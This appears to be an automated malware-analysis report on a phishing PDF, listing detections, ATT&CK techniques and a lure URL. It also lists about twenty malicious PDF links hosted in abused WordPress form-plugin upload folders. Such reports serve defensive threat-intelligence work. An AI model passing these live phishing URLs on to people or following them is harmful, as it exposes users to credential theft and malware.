MALICIOUS
94
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.007 JavaScript
The file was detected as malicious by ML classifiers and ClamAV, indicating a phishing or trojan payload. The embedded URL `https://laborke.ru/uplcv?utm_term=adara+wadan+new` suggests a lure to download further malicious content. Although no scripts were explicitly extracted, the PDF structure and embedded URLs are indicative of a phishing attempt to deliver a secondary payload.
Machine Learning
- Nyx PDF Classifier malicious score 0.7952
Heuristics 3
-
ClamAV: Pdf.Phishing.Trojan-d2528dad23a95d95-d2528dad23a95d95-10044376-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Pdf.Phishing.Trojan-d2528dad23a95d95-d2528dad23a95d95-10044376-0
-
External URI info PDF_URIPDF contains an external URL action
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://laborke.ru/uplcv?utm_term=adara+wadan+new
- http://alternativefitness.com.au/wp-content/plugins/formcraft/file-upload/server/content/files/16093a9b0723d8---lalomawof.pdf
- http://www.191seo.com/wp-content/plugins/formcraft/file-upload/server/content/files/1606d3d4270b8f---kixewulokakibodibi.pdf
- https://michaels-limo.com/wp-content/plugins/formcraft/file-upload/server/content/files/16080b11f56e97---19419349955.pdf
- http://bascobrunswick.com.au/wp-content/plugins/formcraft/file-upload/server/content/files/1607bbbe7bf21f---waborigiwiwusupeb.pdf
- https://kisikana.hr/userfiles/file/40375926739.pdf
- https://amkboiler.com/wp-content/plugins/super-forms/uploads/php/files/7rc1udq80444v9psefd02l80ta/kitorejajudixefa.pdf
- http://www.pirac.org/wp-content/plugins/super-forms/uploads/php/files/79749dc384598f777e9b19f6a8976590/wesifibif.pdf
- http://alhouti.com/userfiles/file/renomesirufovasizeferok.pdf
- https://www.arphplumbing.co.uk/wp-content/plugins/super-forms/uploads/php/files/brd2km3bcc9pcm94qj2paun4oc/46436412964.pdf
- https://lightupalife.org.uk/wp-content/plugins/formcraft/file-upload/server/content/files/1609654be305db---19586399491.pdf
- https://useoneconvo.com/wp-content/plugins/super-forms/uploads/php/files/471cf00eeaad943d85fa2c88ca2392e4/ramokomugako.pdf
- https://www.brunosistemi.com/wp-content/plugins/formcraft/file-upload/server/content/files/1609711a2caf16---22111550633.pdf
- http://asupuro.com/user_data/image//file/61105429404.pdf
- https://ontime-taxi.kg/wp-content/plugins/super-forms/uploads/php/files/90bbd1dee9c225c73a998e04603e5667/50737115916.pdf
- http://www.julitolaschools.com/wp-content/plugins/formcraft/file-upload/server/content/files/1607e9a073b3a0---basofeselaxuniruge.pdf
- http://www.orarestauratorisaf.it/wp-content/plugins/formcraft/file-upload/server/content/files/160970c4d158a4---tenozuvotifigemilel.pdf
- http://al-bandak.com/userfiles/file/davotupanelukedadiw.pdf
- http://www.ascendercorp.com/
- http://www.ascendercorp.com/typedesigners.html
- http://scripts.sil.org/OFL
- http://sinhala.sourceforge.net/
- http://sinhala.cvs.sourceforge.net/viewvc/*checkout*/sinhala/sinhala/fonts/CREDITS
- http://www.gnu.org/licenses/gpl-2.0.html
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
font_00_sfnt_off0000e88b.bin5ca33dd31e038f59ac51d9c08d2140b954e065334bf6163d4a05f4dce8d24a07 |
pdf-font-stream | PDF embedded font (sfnt) at offset 0xE88B | 4692 bytes |
font_01_sfnt_off0000f85c.bin06a5efd455577dae79b4db55d08f1775f3b17d532d664c568ba526b62481ee3a |
pdf-font-stream | PDF embedded font (sfnt) at offset 0xF85C | 32188 bytes |
font_02_sfnt_off0001413a.bincacc549065462a03977c77918f62574e80a7863a399e2b2e2598abdfbf61a8f4 |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x1413A | 11636 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.